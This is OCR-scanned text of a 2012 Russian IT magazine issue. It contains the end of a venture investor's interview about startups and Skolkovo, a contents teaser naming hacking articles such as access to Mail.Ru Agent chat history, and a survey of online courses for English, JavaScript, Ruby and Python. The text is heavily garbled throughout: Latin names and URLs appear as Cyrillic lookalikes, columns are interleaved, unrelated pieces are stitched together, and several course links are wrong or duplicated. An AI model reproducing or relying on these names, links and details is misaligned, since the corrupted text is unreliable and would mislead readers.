добного рода... Было бы странно поверить, что 
все будет хорошо. Особенно когда антрепренер 
впервые делает компанию, имееттолько идею, 
и даже прототипа как такового у него еще нет... 
Увы, это не наша стадия. 



КАК ПРИХОДИТЬ К ИНВЕСТО РУ? 



Есть такая проблема, что люди пытаются 
прийти прямо ко мне. Но лучше, когда они по- 
падают в систему и наш процесс. Когда пишут 
напрямую мне, я могу что-то случайно про- 
пустить, не прочитать — сыпется очень много. 
Начинаются обиды. Предприниматель же счи- 
тает, что то, что у него сделано — это лучше 
всего и неповторимо, и в мире такого больше 
нет. А если я не уделяю этому внимания, значит 
я идиот, или зажравшийся... человек. 

Правильно прийти к венчурному инвесто- 
ру — это сначала сходить на его сайт и посмо- 
треть, что именно он хочет, что рассчитывает 
увидеть. Как правило, мы публикуем такие 
требования. 



СЧИТАТЬ НАС 
РОДИТЕЛЯМИ ѴѴІ-РІ 
НЕПРАВИЛЬНО, 

НО ПЕРВЫЕ РАБОЧИЕ 
ОБРАЗЦЫ СДЕЛАЛИ 
ИМЕННО МЫ. 



Во всем венчурном мире ты лучше работа- 
ешь с проектами, которые приходят по какой- 
то рекомендации, от человека, которому ты 
доверяешь. Когда тебе говорят: «Саш, посмо- 
три, вроде бы интересно», то в первую очередь 
ты, конечно, смотришь на эти проекты. 

Я не люблю бизнес-планов. Их никто 
не любит. Это в каком-то смысле устарев- 
ший формат. Нет, конечно, бизнес-план был 
нужен когда-то, когда не было возможности 
запомнить и проверить все, что тебе говори- 
ли. Сейчас все это можно в два счета сделать 
в презентации на пятнадцать слайдов и все 
факты прикрыть линками на отчеты, справки, 
аналитику и так далее. Хорошо, когда прихо- 
дит презентация и к ней существуют сопут- 
ствующие материалы: ты можешь почитать, 
проанализировать и сказать: «да, вот анализ 
по конкуренции сделан правильно» или 
«анализ рынка и позиционирования сделан 
неверно». 

Очень важно, когда человек хорошо пред- 
ставляет, что он умеет и что нет. Ведь важнее 
всего понять, что ктебе пришла правиль- 



ная, способная и самокритичная команда. 

А если они на что-то не способны, то должны 
четко открыться и сказать: у нас нет пони- 
мания в такой-то области, или, например, 
нет в команде человека, который понимает 
маркетинг. Должны признавать: да, у нас есть 
хороший человек, но мы хотели бы другого, вот 
стакими-то параметрами. 

Важно, чтобы люди понимали, в какой 
рынок они играют. Нужно понимать свое место 
в рынке, кто ваш реальный конкурент. Когда 
пишут в конкурентах Соодіе... Ну, он у всех кон- 
курент, даже у МісгозоЙ и ІВМ. Сегодня вообще 
есть всего четыре компании, которые движут 
миропонимание: Арріе, Соодіе, РасеЬоок 
и Атагоп. Все остальные пытаются под- 
строиться, в том числе и МісгозоЙ. Пытаются 
найти, как и где сконкурировать с этой новой 
волной и остаться на вершине. 

Народ ленится посмотреть, что, вообще- 
то, в области есть куча проинвестированных 
компаний, у которых есть деньги. И нужно 
сравниться с ними сточки зрения своих ре- 
сурсов, людей. Понять, как выиграть у них эту 
игру. Понять, как двигаться дальше, как будут 
использоваться деньги, зачем вообще нужны 
деньги. 

Важно понимать: венчурный фонд — это 
сервисная компания. Это не есть компания, 
которая ведет тебя к успеху. Это всего-навсего 
сервисная компания, которая помогаеттебе 
туда прийти. Поэтому инициатива всегда 
должна находиться в руках СЕО, предпринима- 
теля (или антрепренера, как мы чаще говорим) 
и так далее. 

Компания для предпринимателя — ребе- 
нок. Сам он — неумелый родитель. А мы — 
эдакие опытные няни. С этой точки зрения, 
если мы будем навязывать ему, что делать, это 
будет неправильно. Он должен обращаться 
к нам и говорить: «Воту меня ребенок захны- 
кал, что делать? Какие бывают варианты, что 
мне нужно сделать, чтобы он успокоился? Или 
«Вот он хочет заниматься какими-то другими 
игрушками, делать что-то другое. Что в таком 
случае предпринять? Дать ему возможность 
заниматься другими игрушками?». Вот здесь 
венчурный капиталист очень полезен: он мо- 
жет прийти, помочь и многое сделать. 

Часто венчурные капиталисты выступают 
в роли такого НК или хэдхантера, помогают 
выстроить команду, заменить, подрастить 
ее. Но все антрепренеры разные. Бывают 
и такие, кто считает, что раз их компания 
растет, приносит прибыль (хоть маленькую), 
значит, все — они герои, они уже могут жить не 
по средствам. 



ПРО МОЛОДЫЕ ПРОЕКТЫ 



Еще несколько лет назад мы смеялись над 
тем, что есть такие чемпионы всех конкурсов, 
которые с одним и тем же проектом ходят 
по всем тусовкам и везде его продвигают. Их 

было считанное количество. На сегодняшний 
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СОѴЕВ 5Т0ГСѴ 



день я бы так не сказал. Существует достаточ- 
но много интересных проектов, интересных 
уже с точки зрения совершенства представ- 
ления. 

Есть проблема — многие идеи мелкие. Они 

нишевые и нацелены только на Россию. Люди 
не осознают рынка глобального. А на россий- 
ском рынке только складывается культура 
покупки компаний. Я всегда привожу в пример 
Ооодіе. Статистику за 2009 или 2010 год, когда 
они купили 42 компании. Из них только две 
были объемом 400 миллионов и миллиард. 

Все остальные сорок были... ну, средний чек 
составлял 25 миллионов. Значит, кого-то они 
купили за пятьдесят, кого-то — за один. Услов- 
но. Или за 10-30. В России чек будет ниже в 2-3 
раза. Условно, средний чек сделки в России 
должен составлять 25 миллионов поделить 
на 3, ну пусть это будет 8-10 миллионов. Сред- 
ний чек 10 миллионов, но если я хочу иметь 
соответствующий возврат, я должен вложить 
более 30% компании. Я должен вложить тысяч 
300 и получить обратно свои 3 миллиона, вот 
это будет нормально. Но за 300 тысяч, вроде 
бы, и компанию не построишь. Или надо на- 
строить такие компании, которые бы уклады- 
вались в эту экономику. Это та часть осозна- 
ния, которая еще приходит. И формируется 
венчурный рынок. Но количество компаний 
выросло, хотя есть вот такие проблемы. 

Проектов «до дІоЬаІ», которые могут 
удивить мир (новые РагаІІеІз, Касперские, 
Акронисы) не много. Я всегда объясняю, что 
причина в том, что, во-первых, у нас неттаких 
индустриальных лидеров, чтобы вот эти «темы» 
можно было ловить и понимать, где существуют 
«дырки», которые можно залатать. Во-вторых, 
у нас нет исследований. В старые времена 
были отраслевые НИИ, сейчас их нет или 
совсем мало. То есть, непонятно, где должна 
формироваться база знаний. Поэтому компа- 
нии в основном создаются людьми, которые 
начинают писать софт: смотрят, что где-то есть 
какие-то проблемы, и что-то там решают. Часто 
решают они очень нишевые задачи. А вот рас- 
ширение бизнеса зачастую затруднительно. 
Есть куча людей, которые на таком нишевом 
софте зарабатывают деньги (РатаІесЬ и их 
РАсІтіп, скажем, и можно назвать еще много 
интересных компаний), но они вырастают до 



определенного размера и дальше роста у них 
нет. Они не могут вырваться из этой ниши, пото- 
му что у них нет базы знаний, они не знают, что 
дальше существует в индустрии, что они могли 
бы решать. И это только одна из проблем. 

Когда ІТ-предприниматели быстро до- 
биваются очень больших успехов, а потом 
начинают просаживаться. Это другая про- 
блема. Причина одна — они зарабатывают 
много денег сами, владеют практически 
всей компанией и зарабатывают от 1 до 10 
миллионов долларов в год. Им ничего не 
надо - у них жизнь удалась. Амбиций роста 
в следующий этап у них нет. Им сложно — они 
хотят, но, с другой стороны, им придется рас- 
ставаться с этим полным владением того, что 
они делают. Есть, к примеру, такая компания 
ЭеіВгаіпз из Питера, вот она запросто может 
стать миллиардной компанией. Но их, видимо, 
удовлетворяютте 40-60 миллионов долларов 
оборота, с которыми они работают. И владель- 
цы как бы игнорируют всех, им не интересны 
деньги никаких венчурных капиталистов. 

Но приятная штука в том, что в России таких 
компаний довольно много. 



СКОЛКОВО 



Если я увижу в Сколково «распил бабла», я 
сразу напишу заявление об уходе. Думаю, так 
поступят и другие люди из совета директоров. 
Эрик Шмидт, любые другие иностранцы... Если 
они это увидят, они уйдут. Может ли в Сколково 
появиться «распил»? В строительстве, в схе- 
мах строительства, наверное, что-то может 
произойти. Но чтобы он появился именно 
в области фондирования компаний... врядли. 
По крайне мере, там явно сегодня не нужно да- 
вать никому никаких откатов, чтобы получить 
гранты или статус участника. Все это делается 
очень по-честному. 

Грустно, но хорошие компании не хотят 
брать гранты в Сколково — с ними куча возни. 

Я говорил со многими, и они считают, что у них 
нет времени на все эти отчеты. Но пока эти 
самые отчеты не сделаешь — следующий этап 
гранта не получишь. Значит, возникают кассо- 
вые разрывы. Вот компании и считают, что все 
это нафиг не нужно, один геморрой. 

Сейчас я затаскиваю туда исследова- 
тельский проект под названием ОрепГІоѵѵ, 



ТРИ ПОЖЕЛАНИЯ ПРЕДПРИНИМАТЕЛЯМ 



Л БЫТЬ НЕМНОЖКО 
1 СКА2Ѵ 

Стремиться оставаться 
немножко ненормальным, 
даже если это непонятно 
окружающим. 



о учиться 

^ НА ОШИБКАХ 

И делать их как можно 
больше. Но никогда 
не повторять! 



П СТАВИТЬ АМБИЦИ- 
° ОЗНЫЕ ЗАДАЧИ 

И так их отмерять, чтобы 
даже если ты достигнешь 
20-30% от задуманного, 
то мог бы собой гордиться. 



который занимается направлением БоНѵѵаге- 
ОеЛпесІ Иеіѵѵогкіпд. Ведь проблема номер 
один больших компаний и телекома — уде- 
шевить все затраты на сети и ЦОДы за счет 
виртуализации слоя сети. Это большое 
направление, модное и популярное. Я струдом 
затаскиваю его в Сколково, чтобы построить 
исследования совместно со Стэнфордом. Но я 
рассчитываю, что из этого проекта может 
появиться новая плеяда мыслящих ученых, 
могут родиться прорывные компании. 

У нас не формируется база знаний. Скол- 
ково должно сыграть большую роль именно 
в накоплении и формировании базы знаний 
в индустрии. Быть может, даже большую, чем 
оно играет сейчас. В старые времена были 
отраслевые НИИ, сейчас их нет. То есть, где 
должна база знаний формироваться — непо- 
нятно. У нас есть неплохие сетевые инженеры, 
есть неплохие институты, которые готовят 
неплохих сетевых инженеров, просто они 
не имеют индустриального понимания, куда им 
дернуться и двинуться. Если же создать базу 
знаний, они будут видеть: вот оно — лежит. 
Скажем, к примеру, если я напишу некий 
софт, чтобы роутер быстрее работал (именно 
софтовый роутер), то вот — я могу создать 
и компанию на основании моих исследований. 
Воттакие я вижу возможности. 

Сколково должно быть исключением из 
правил. Сейчас же там для компаний, которые 
получают гранты, устанавливают правила: 
например, средняя зарплата должна быть 
только такая-то. Или говорят, что нельзя пере- 
распределять бюджеты. Но ведь бывает и так, 
что компания очень динамичная. Может быть, 
компания заявила, что бюджет надо было 
потратить на маркетинг, но теперь его нужно 
потратить на покупку пяти дополнительных 
компьютеров. А им говорят — нет, нельзя, надо 
тратить на маркетинг! Вот эта совковость, ко- 
торая сидит в Счетной палате, в Минфине, она 
и заставляет Сколково жить по правилам, и это 
может погубить Сколково. 

Сколково нужны такие эксперты- 
дженералисты, которые имеют понимание 
в технологиях, имеют доступ к экспертизе. 

Как венчурный капиталист, я ведь не эксперт 
во всем. Если мне нужна какая-то специальная 
экспертиза, я нахожу человека на мировом 
рынке, которому я могу доверять: я знаю, что 
это именно тот человек, который может под- 
сказать мне, хорошо это или плохо. Но я все же 
отвечаю за результат и своей репутацией. 

В Сколково нужно создавать атмосферу 
простоты, прозрачности, доверия и репута- 
ционной ответственности. Когда не просто 
существует какая-то компании, а за компанией 
строит конкретный антрепренер, чья репута- 
ция какими-то вещами либо поднимается, либо 
опускается. Вот в таком случае, думаю, такая 
атмосфера сложится. Такживет Кремниевая 
долина. Чтобы создать это, нам нужно, чтобы 
было кипение, круговорот открытости и всего 
остального. Я хочу верить, что получится. 

Иначе будеттрудно запустить инновационную 
индустрию в России. И-И 
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30 страниц на одной полосе. 
Тизер некоторых статей. 



Ргеѵіехл/ 



РС20МЕ 



зо 



УНИВЕРОНЯАЙН 

Освоить новый для себя язык програм- 
мирования сегодня просто как никогда. 
Чтобы получить минимальный базис, 
спомощью которого можно начать 
разработку простейших приложений, 
теперь необязательно даже читать 
умные книжки. Для многих технологий 
появились очень доступные и понятные 
обучалки, которые в интерактивном 
режиме позвол я ют пощупать новую для 
себя технологию без лишней при люди и 
и занудства. А для фундаментальных 
предметов ведущие ВУЗы мира разра- 
батывают онлайн-курсы, позволяющие 
прослушать лекции, ранее доступные 
только студентам за бешенные деньги. 




РС20ЫЕ 



ВЗЛОМ 






РАСШАРИТЬ ПРИЛОЖЕНИЕ! 




«6006І.ЕСЛЕДИТЗАТ0Б0И,МЫ — НЕТ» 
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Можно ли перенести окно приложения из 


40 


боодіе уже давно мейнстрим. Гики 


56 




ѴѴЫоѵѵз-системы в Ыпихи продолжить 




пред почитают другой поисковик — 





с ним работу? Можно, если установить на йискОискбо, который заботится об 

обоихкомпьютерахутилитуѴѴіпБѵѵіІсЬ. анонимности пользователей. 



ТЕМНАЯ СТОРОНАТРАССИРОВКИ 

Механизмы отладки итрассировки АБР. 
ИЕТ приложений, которыми пользуются 
ѵѵеЬ-разрабочики, могут стать причиной 
взлома. Разбираемся на примере. 



ВЗЛОМ 



МАШАКЕ 



[взлом" ] 

! МаіІ.Ки Агента ; 

I 1 

ПОЛУЧАЕМ ДОСТУП К ИСТОРИИ ' 
ПЕРЕПИСКИ И КОНТАКТАМ N 

| В ПОПУЛЯРНОМ МЕССЕНДЖЕРЕ 







ВЗЛОМ МАП.ІШ АГЕНТА 




САНТИВИРУСОМ ПОКОНЧЕНО 
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Эта статья не о взломе замечательного 
мессенджера. Это история отом, какс 


74 


Последняя статья из серии о внутреннем 
устройствеанивирусов. Вэтотраз мы 


80 



нуля был отреверсен формат, в котором рассмотрим мониторинг сетевой актив- 

хранятсясообщения пользователя. ности и песочницы. 



НЕИЗВЕСТНАЯ УГРОЗА 

Испытываем эвристику а веров на 
самых новых вирусах, которые еще не 
п оя вились в базах популярных а нти- 
вирусныхрешений. 
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РС20ЫЕ 



Капитан Улитка 




МОЖНО ЛИ СТАТЬ СПЕЦИАЛИСТОМ В ІТ, 
НЕ ВЫХОДЯ ИЗ ДОМА? ДА! 



На одних только статьях журнала «Хакер» далеко 
не уедешь. Это я тебе точно говорю. Если хочешь стать 
настоящим специалистом в области ІТ, необходимо учиться 
и обязательно получить фундаментальные знания о предмете. 
К счастью, сегодня для этого возможностей больше, чем 
когда-либо. В Сети не только доступно множество учебников 
бесплатно, но и стремительно развиваются совершенно 
новые, прогрессивные способы обучения. И особенно это 
касается нашей - ІТ'шной — специальности. 



ель данного материала — показать, 
насколько просто сегодня можно 
обучаться самостоятельно. Бы- 
стро осваивать новые технологии и языки 
программирования. При этом делать это не 
в напряг и получать настоящее удовольствие 
от обучения. Я не претендую на полноту кар- 
тины, и эта статья, само собой, не является 
сборником всех проектов, которые могут по- 
мочьтебе в самообразовании. Но я постарал- 
ся собрать некоторые особенно интересные 
сервисы, которые были интересны лично мне. 
Уверен, они пригодятся и тебе. 




030 



ХАКЕР 04/159/2012 







Универ онлайн 



Изучаем английский язык 



7ПГѵ 



Я серьезно рискую, начиная этот материал со 
слов «английский язык». У многих людей с ним 
сложности, и ирония в том, что чем серьезнее 
проблема, тем больше люди противятся его 
изучению, придумывая отговорки и оправдания. 
Как бы там ни было, могу тебе сказать с пол- 
ной уверенностью: по-настоящему успешный 
ІТ-специалист если и может обойтись без 
английского языка, то упускает при этом многие 



интересные возможности. Большинство авто- 
ритетных конференций проходит на английском. 
В самых крупных сообществах специалистов 
принятанглийский язык. Известные ученые ве- 
дут блоги и пишут статьи на английском языке. 
На английском языке говорят в Силиконовой до- 
лине. И на нем же изъясняются программисты из 
Индии, которых стало так много, что спрятаться 
от них у тебя не получится при всем желании :). 



Короче говоря, изучение языка нужно добавить 
в свой личный список дел в качестве одного 
из приоритетных пунктов. Сказать по правде, 
абсолютное большинство ресурсов, о которых я 
буду говорить далее, требуют хотя бы минималь- 
ного знания английского. Однако для первого 
проекта из нашего обзора иностранный как раз 
не нужен — напротив, он направлен на то, чтобы 
ты быстро прокачал свои знания «ИнЯз'а». 



ШбУАІ-ЕО 



Есть простое правило: чтобы лучше и уверен- 
нее подтягиваться на турнике, нужно больше 
и чаще подтягиваться на турнике. Просто ин- 
тенсивнее заниматься. Так же и с английским: 
чтобы хорошо понимать на слух английскую 
речь, не вслушиваясь в каждое слово в по- 
пытке разобрать хоть что-то, нужно больше 
слушать этой самой речи. Можно начать с про- 
смотра какого-нибудь сериала, подключив 
для уверенности оригинальные субтитры, но... 
по сравнению с тем, что представляет сервис 
І_іпдиаІ_ео.ги, — это прошлый век. В его базе 
уже собрано огромное количество сериалов, 
всевозможных фильмов, записей различных 
семинаров и выступлений (например, темати- 



ческих минивыступлений с ТЕО.сот), лекций 
из западных университетов (в том числе по 
иностранному языку] и так далее. Все это 
разбито на категории по тематике, сложности 
и рейтингу у пользователей. Но главное за- 
ключается в том, как именно сервис позволяет 
этот контент потреблять. Рядом с видео выво- 
дится полная расшифровка речи, поэтомуты 
всегда можешь прочитать непонятный на слух 
фрагмент. Встречаешь неизвестное слово? 
Один клик, — и І_іпдиаІ_ео тутже показывает 
перевод и заносит это слово в твой личный 
словарь, чтобы дальше с помощью самых раз- 
ных упражнений ты мог запомнить его и начать 
использовать в нужном контексте. Никаких 
тебе больше ковыряний с субтитрами и сло- 
варей, -ты просто смотришь интересный для 




себя контент и быстро разбираешься с непо- 
нятными местами. Для себя я не вижу лучшего 
способа, во-первых, пополнять словарный 
запас, а во-вторых, привыкнуть к английской 
речи. Чтобы «отрабатывать» те слова, которые 
просто встречаются в интернете, я давно себе 
установил специальный аддон для браузера. 



Онлайн-универы 



Найдется немало людей, которые захотят по- 
спорить о том, необходимо ли ИТ-специалисту 
высшее образование. Правы те, кто говорит, что 
фундаментальные знания остро необходимы. 

Но можно согласиться и с теми, кто утверждает, 



что всему можно научиться самостоятельно, 

— было бы желание. Последнее стало еще 
проще после того как ведущие западные вузы 
с зашкаливающей стоимостью обучения начали 
не только выкладывать видео своих лекций 



(например, в іТипез), но и вообще формиро- 
вать культуру преподавания университетских 
предметов онлайн. Хотел бы я сейчас отметить 
подобные инициативы со стороны российских 
вузов, но здесь сказать пока нечего. 



УЧЕБНЫЕ КУРСЫ ОТ СТЭНФОРДА 

Университет Стэнфорда, расположенный в Кали- 
форнии, известен по всему миру. Фактически это 
кузница кадров для технологических компаний 
Силиконовой долины, многие из которых рас- 
положены в Пало Альто — в том же городе, что 
и сам университет. Попасть в Стэнфорд — мечта 
для многих молодых людей, которые жаждут 
сделать карьеру в области ИТ. Чем больше 
читаешь про Стэнфорд, тем больше радуешься 
тому факту, что осенью университетзапустил 
проект бесплатных онлайн-курсов. Изначально 
всем желающим предлагалось пройти три курса: 
«Машинное обучение» (ті-сіазз.огд ). «Искус- 



ственный интеллект» ( аі-сіазз.сот ), «Введение 
в базы данных» ( сІЬ-сІазз.огд ). Каждый из курсов 
состоит из лекций, проверочных работ и финаль- 
ного экзамена. В случае успешного завершения 
обучения студент получает сертификат в виде 
РОР-файла, заверенного цифровой подписью 
преподавателя. Эксперимент оказался успеш- 
ным, и в начале года Стэнфорд анонсировал 
сразу дюжину новых курсов, в том числе: 

• Информационная безопасность ( зесигі^ѵ- 
сіазз.огд ): 

• Проектирование и анализ алгоритмов 

( зесигііѵ-сіазз.огд ); 

• Теория игр ( сзі 01 -сіазз.огд ): 

• Информатика ( сзЮІ-сІазз.огд ): 



• Криптография ( сзі 01 -сіазз.огд ]; 

Помимо непосредственно ИТ'шных предметов, 
есть пара курсов по предпринимательству 
(в области высоких технологий). Я пока успел по- 
слушать курс по машинному обучению и получил 
огромное удовольствие. Курс построен таким 
образом, чтобы быть понятным практически 
каждому, хотя, безусловно, знания в области 
дискретной математики и математического ана- 
лиза будут здесь очень полезны. Надо сказать, 
что видео любого из курсов сопровождается 
субтитрами на случай, если что-то сложно разо- 
брать на слух. Как правило, язык очень простой, 
поэтому все понятно даже со средним уровнем 
английского. 



МІТХ ОТ МАССАЧУСЕТСКОГО 
ТЕХНОЛОГИЧЕСКОГО ИНСТИТУТА 



Ты наверняка слышал и о МІТ — не менее из- 
вестном западном вузе. Тоттоже пошел по стопам 
Стэнфорда и в начале года анонсировал раз- 
работку МІТх — технологической платформы для 
онлайн-образования. И вотуже в феврале появи- 



лась информация о первом курсе, который будет 
проходить с помощью этой системы- «6. 002х: 
Схемотехника и электроника». Обучение начнется 
весной и потребует примерно десять часов в не- 
делю. Предмет непростой, поэтому допускаются 
только студенты, обладающие необходимыми 
знаниями по электричеству, магнетизму и диффе- 
ренциальному исчислению. Среди трех препо- 



давателей — профессор Джеральд Сассмен, 
который создал язык БсЬете и является автором 
одного из самых лучших учебников по програм- 
мированию — «Бігисіиге апсі Іпіегргеіаііоп о{ 
Сотриіег Ргодгатз». В скором будущем обеща- 
ется появление и других предметов. Уверен, что 
подобное по зубам и российским учебным заведе- 
ниям, которые просто обязаны не отставать. 
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РС20ЫЕ 



ЭаѵаЗсгірІ 



'і у Оиеп / 



Главное, о чем я хочу сегодня рассказать — 
это сервисы, позволяющие изучить вполне 
конкретный язык программирования. Тут 
оченьзаметна закономерность: чем актив- 
нее язык развивается и набирает популяр- 
ность, тем больше появляется инструментов 
для его изучения. Для примера я взял не- 



сколько особенно модных языков програм- 
мирования: РуіЬоп, РиЬу (плюс РиЬу оп Раііз) 
и, конечно же, ЭаѵаЗсгірІ (НТМІ_5). С послед- 
него и начнем. 

Ни одно современное веб-приложение не 
обходится сегодня без ударной дозы кода 
на 65, на котором полностью реализовано 



взаимодействие с пользователем. Особен- 
ные гики умудряются имплементировать на 
6аѵа5сгірІ совершенно невозможные вещи: 
взять хотя бы проект виртуальной машины, 
на которой вполне себе успешно запускается 
Ыпих ( ЬеІІагс1.огд/|5Ііпих ). Но этот случай мы 
рассматривать не будем :). 



ССЮЕСАОЕМѴ 



ѵтѵѵ.сосіесасіету.сот 

Простой вопрос: какой самый проверенный 
способ выучить новый язык программирова- 
ния? Взять умную книгу и начать ее читать. 
Этот подход никогда не устареет. Так было 
двадцать лет назад, так есть и сейчас. Однако 
сложно представить, что к 21 веку не приду- 
мали более прогрессивных методов обучения, 
тем более — обучения программированию. 
Собесабету — это стартап, позиционирующий 
себя как школу разработчика. За семьдесят 
два часа после открытия он собрал более 
двухсоттысяч (вдумайся в цифру!) начинаю- 
щих программистов, предложив им пройти 
интерактивный курс 6аѵа5сгірЕ 



Секретуспеха в изящности процесса обу- 
чения. С помощью специального интерфейса 
студентам сразу же начинают рассказывать 
о базовых особенностях языка и его синтак- 
сиса, и, что важнее всего, предлагают сразу 
проверить знания в действии, набрав код 
в специальной консоли. Все это происходит 
в браузере, без необходимости устанавливать 
что-либо на своем компьютере. Шагза шагом 
можно быстро разобраться, что к чему, и по- 
нять все базовые принципы 6аѵа5сгірЕ Чтобы 
еще больше стимулировать студентов к обуче- 
нию, по мере прохождения курса им выдаются 
награды. 

Проект быстро получил финансирование 
и очень скоро обещает значительное попол- 
нение учебных курсов. Уже сейчас доступна 
система для создания своих курсов на готовой 




платформе Собесабету. Проект выбрал 
модель ІІ6С (Ібзег-депегаіеб сопіепі) и сейчас 
активно привлекает к пополнению контента 
сообщество. 



ВЫУЧИТЬ ^ІІЕРѴ 
ЗА ТРИДЦАТЬ ДНЕЙ 

Іеагпіяиегу.іиізріиз.сот 

Неотделимой частью 6аѵа5сгірІ постепенно 
стала библиотека )0иегу, упрощающая работу 
с НТМЬдокументом, обработку событий, 
создание анимации и реализацию А6АХ. 
Фактически )(3иегу во многом изменил подход 
к программированию на 6аѵа5сгірЕ Разобрать- 
ся с библиотекой в принципе несложно. Но 
чтобы сделать это еще более безболезненно, 



портал ЫеииІ5+, известный своими каче- 
ственными обучающими статьями, разработал 
специальный курс. Курс разбит на тридцать 
уроков-скринкастов по пятнадцать минут 
каждый, что позволяет день за днем посте- 
пенно брать библиотеку на вооружение. Как 
ни крути, а пятнадцать минут можно найти 
всегда. Да и формат обучения очень приятный: 
лично для меня нет ничего более понятного, 
чем непосредственная демонстрация кодинга 
с комментариями по ходу дела. Для тех, кто 
только начинает изучать 65, есть и видеокурс 
этого же автора [ ЬИ.Іу/Ад К450 ). 




ПЕРВЫЙ ПОЛЕТ НА^ІІЕРѴ 



сосІезсІіооІ.сот/соигзез/іяиегу-аіг-НгзІ-ЛідІі 

Если спросить, кто снимает скринкасты 
эталонного качества, то среди победите- 
лей совершенно точно будет онлайн-школа 
программирования собе всЬооІ. Это очень 
профессиональный проект, предлагающий 
как платные, так и бесплатные курсы для 
специалистов различного уровня. Курс «)0иегу 
Аіг: Рігзі РІідЫ» долгое время был платным, но 
с недавнего времени открыт всем желающим. 
Он состоит из пяти уровней, каждый из кото- 



рых включает в себя обучающий скринкаст 
и интерактивные упражнения по программи- 
рованию, реализованные прямо в браузере. За 
прохождение заданий начисляются очки (на- 
пример, 350 за решенную задачку). Если где-то 
возникла трудность, можно попросить под- 
сказку, но в этом случае не избежать штраф- 
ных баллов. Ріа первом уровне предлагается 
пройти азы ЭаѵаЗсгірЕ на втором — селекторы, 
на третьем — С55-атрибуты, на четвертом — 
манипулирование с РІТМЕ-элементами и йОМ, 
на пятом — работа с событиями. Чтобы пройти 
курс, необходимо выполнить пятьдесят пять 
простых и не очень упражнений. 
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Универ онлайн 



I 



КиЬу и КиЬу оп Раііз 




Если ты читал в прошлом номере интервью 
с Аленой Владимирской, которая по праву счи- 
тается ведущим хедхантером Рунета, то уже 
знаешь, насколько востребованными сейчас 
являются программисты на РиЬу оп Раііз. За 
грамотными специалистами, готовыми быстро 
поднимать растущие веб-проекты, гоняются 



все. И чем больше растет спрос, тем больше 
становятся зарплаты. Если у тебя есть опыт 
программирования, и ты хочешь переква- 
лифицироваться на более востребованное 
направление, то РиЬу в связке с РиЬу оп Ра Из 
— совершенно точно очень неплохой вариант. 
И выучить его сейчас можно довольно быстро. 



Впрочем, знание языка пригодится, даже если 
ты не собираешься работать профессиональ- 
ным разработчиком. РиЬу популярен и среди 
экспертов по информационной безопасности: 
к примеру, известный фреймворк для хакера 
Меіазріоіі (и в том числе все его модули) на- 
писаны именно на РиЬу. 



РІІВѴМОІМК 



гиЬуплопк.сот 

Проект представляет собой интерактивную 
книгу, состоящую из пятидесяти упражнений, 
позволяющих быстро пройтись по основам 
РиЬу. Тебе говорят: «Массив из элементов 
создается так - попробуй». И ты пробуешь. 
Далее объясняется что-то еще, — ты опять 
же сразу проверяешь это в действии. Как 
только знаний становится достаточно, тебе 



предлагаются более сложные упражнения. 
Совершенно улетно реализована проверка 
выполненных заданий (код решения, есте- 
ственно, надо набирать прямо в браузере, 
а редактор даже поддерживает подсветку 
синтаксиса). Для каждого упражнения заданы 
контрольные точки, по которым проверяет- 
ся правильность решения. Таким образом, 
в любой момент можно понять, что именно не 
нравится интерактивной системе, какой ре- 
зультат должен быть на выходе, и где в твоем 
решении спряталась ошибка. 
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ТРУ РІІВѴ 



ІгугиЬу.огд 

Если у тебя был мало-мальский опыт програм- 
мирования, то эта интерактивная обучалка 
буквально за пятнадцать минут позволиттебе 
пройтись по базовым понятиям языка РиЬу 
и понять, что к чему. Впрочем, даже если ты 



вообще никогда не имел дело с программиро- 
ванием, Ігу гиЬу будет тебе по зубам. Правда, 
в этом случае обучение, вероятно, займет чуть 
больше времени. Всего нужно пройти восемь 
уроков и справиться с более чем пятьюдесятью 
заданиями. Проект стал еще лучше после того, 
как его взяла под свое крыло уже упомянутая 
выше школа сосіе зсЬооІ. Теперь это практи- 
чески идеальный репетитор. 
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ТНЕ ІІМТРО ТО РАІІ_5 5СРЕЕІМСА5Т I 
ѴѴІ5Н I НАй 

ыиу/2яі_ѵрн 

Как уже было отмечено, язык РиЬу четко ас- 
социируется с популярнейшим фреймворком 
для построения веб-приложений РиЬу Оп 
Раііз. Последний помог взлететь не одному 
стартапу из Силиконовой долины, в том 
числе и Тѵѵіиег'у. Джеффри Вэй — главный 
редактор сервиса Іиізріиз.сот — записал 



убойный скринкастс говорящим названием 
«Скринкаст для чайников в Раііз, с которо- 
го я хотел бы начать сам». В 40-минутном 
ролике в самой доходчивой форме рассказы- 
вается, как использовать Раііз. После этого 
слова «Мосіеіз», «Юй», «АсІіѵеРесогсІ», 
«Р5рес», «СаруЬага», «Рагііаіз» уже не будут 
пугать. Это не единственный скринкаст для 
начинающих: немало видеоуроков для про- 
граммистов самого разного уровня можно 
найти на другом профильном проекте — 
гаіізсазіз.сот. 




РАІІ_5 РОР 20МВІЕ5 



гаіІз^огготЬіез.огд 

После того (и только после того!) как у тебя 
будут необходимые знания Раііз и некоторый 
опыт в создании веб-приложений, обязатель- 
но нужно пройти бесплатный курс «Рельсы 
для зомби» от все той же школы сосіе зсЬооІ. 



Записанные на неизменно высоком уров- 
не уроки, приправленные здоровой дозой 
юмора, сопровождаются упражнениями, 
составленными из ситуаций, с которыми 
каждый день встречаются программисты на 
«рельсах». Если этого курса тебе окажется 
мало, то у авторов есть продолжение «Раііз 
іюг 2отЫез 2», но его можно пройти уже 
только за денежку. 
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РС20ЫЕ 



РуНіоп 



руіНоп 



РуіЬоп — один из популярнейших языков 
программирования среди специалистов по 
информационной безопасности. Огромное ко- 
личество подключаемых библиотек позволяет 
быстро писать сложные сценарии и вспомога- 
тельные приложения. Многие профи вообще 
считают РуіЬоп идеальным инструментом для 



максимально быстрого прототипирования 
сложных информационных систем. Впрочем, 
прототипом дело часто не ограничивается: 
найдется немало проектов, код которых на- 
писан на РуіЬоп, и которые выдерживают 
огромные нагрузки. Изучить этот язык можно 
даже просто для себя: у меня десятки раз 



бывала ситуация, когда нужно было что-то 
оптимизировать, и каждый раз знания языка 
оказывались очень полезны. 

Более того, РуіЬоп часто встраивают во многие 
серьезные приложения в качестве скриптово- 
го языка, чтобы иметь богатые возможности 
для создания сценариев. 



ПОПРОБУЙ РУТН О N ! 



ІгуруІІіоп.огд 

Лучший способ быстрого старта — попро- 
бовать онлайн-обучалку РуіЬоп. По инте- 
рактивности сервис сильно проигрывает 
аналогичным проектам для Э5 и РиЬу, но, тем 
не менее, позволяет пройти базовый курс 
обучения прямо в браузере. На компьютер не 



надо даже устанавливать интерпретатор. Это 
очень удобно: любой приведенный пример 
можно тут же попробовать в действии. Однако 
на этом интерактивность заканчивается: Тгу 
